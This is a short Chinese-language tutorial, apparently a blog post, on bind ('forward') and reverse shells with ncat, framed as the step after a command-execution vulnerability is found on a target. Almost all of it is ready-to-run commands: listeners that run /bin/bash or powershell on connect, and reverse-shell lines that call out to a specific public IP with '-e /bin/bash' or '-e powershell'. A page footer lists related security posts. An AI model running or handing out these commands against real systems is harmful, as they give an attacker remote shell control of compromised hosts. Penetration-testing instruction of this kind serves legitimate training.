正反向shell

正反向shell

在实际的应用场景中一般是先找到可以命令执行的漏洞,如果目标主机没有ncat我们要先执行下载ncat命令在被控的服务器上

正向shell

应用场景:在被控端的访问没有限制的时候,控制端向被控端发起了链接,控制端可以是公网ip也可以是内网ip

被控端为Linux:

shell 复制代码
被控端:ncat -lvp 8888 -e /bin/bash
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 /bin/bash

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

被控端为Windows

shell 复制代码
被控端:ncat -lvp 8888 -e powershell
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 powershell

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

在连接成功了之后(即在被控制端输入ncat 117.50.117.71 8888后)就可以输入指令查看被控端的各种信息

如图:

反向shell

应用场景:在被控端口发访问有限制,控制无法直接访问到被控端

由被控端向控制端发起连接,控制端要具备公网地址

被控端为Linux:

shell 复制代码
被控端:ncat 117.50.177.71 9999 -e /bin/bash
作用:使用ncat连接到指定的ip地址端口,在建立连接后执行bashshell
控制端:ncat -lvp 9999
作用:监听指定端口

被控端为Windows

shell 复制代码
被控端:ncat 117.50.117.71 8888 -e powershell
作用:使用ncat连接指定的地址端口,并在连接成功后执行 powershell

控制端:ncat -lvp 8888
作用:监听指定的端口

在控制端监听后即可对被控端控制

相关推荐
hcja66614 小时前
WordPress wpForo Forum插件漏洞CVE-2025-11740复现
web安全·网络安全
kali-Myon15 小时前
NewStarCTF2025-Week4-Web
sql·安全·web安全·php·ctf·ssti·ssrf
Z3r4y15 小时前
【代码审计】RuoYi-3.0 三处安全问题分析
java·web安全·代码审计·ruoyi-3.0
安全不再安全16 小时前
免杀技巧 - 早鸟注入详细学习笔记
linux·windows·笔记·学习·测试工具·web安全·网络安全
挨踢攻城19 小时前
项目实战 | 新建校区网络安全项目:从搭建到交付
安全·web安全·公众号:厦门微思网络·华为网络安全项目·项目实战案例·网络安全项目·新建校区网络安全项目
AI分享猿21 小时前
免费WAF天花板!雷池WAF护跨境电商:企业级CC攻击防御,Apache无缝适配
爬虫·web安全
我就是一粒沙1 天前
网络安全培训
网络·安全·web安全
安全系统学习1 天前
自学网络安全学习的误区和陷阱
数据库·学习·安全·web安全·网络安全·安全架构
-曾牛1 天前
网络安全常见的框架漏洞
安全·web安全·网络安全·渗透测试·文件包含·漏洞复现·框架漏洞
白帽子黑客杰哥1 天前
湖湘杯网络安全技能大赛参与形式
数据库·web安全·渗透测试·安全演练·湖湘杯·实战演练